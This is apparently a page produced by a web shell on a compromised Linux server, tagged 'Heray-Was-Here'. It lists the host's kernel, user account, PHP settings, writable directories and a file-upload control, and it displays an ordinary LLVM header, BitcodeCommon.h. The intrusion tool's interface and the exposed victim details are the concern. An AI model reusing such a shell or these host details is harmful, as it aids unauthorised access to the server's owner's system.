Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/self/root/proc/thread-self/root/usr/include/llvm/Bitcode/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/proc/thread-self/root/usr/include/llvm/Bitcode/BitcodeCommon.h
//===- BitcodeCommon.h - Common code for encode/decode   --------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This header defines common code to be used by BitcodeWriter and
// BitcodeReader.
//
//===----------------------------------------------------------------------===//

#ifndef LLVM_BITCODE_BITCODECOMMON_H
#define LLVM_BITCODE_BITCODECOMMON_H

#include "llvm/ADT/Bitfields.h"

namespace llvm {

struct AllocaPackedValues {
  // We increased the number of bits needed to represent alignment to be more
  // than 5, but to preserve backward compatibility we store the upper bits
  // separately.
  using AlignLower = Bitfield::Element<unsigned, 0, 5>;
  using UsedWithInAlloca = Bitfield::Element<bool, AlignLower::NextBit, 1>;
  using ExplicitType = Bitfield::Element<bool, UsedWithInAlloca::NextBit, 1>;
  using SwiftError = Bitfield::Element<bool, ExplicitType::NextBit, 1>;
  using AlignUpper = Bitfield::Element<unsigned, SwiftError::NextBit, 3>;
};

} // namespace llvm

#endif // LLVM_BITCODE_BITCODECOMMON_H

Hry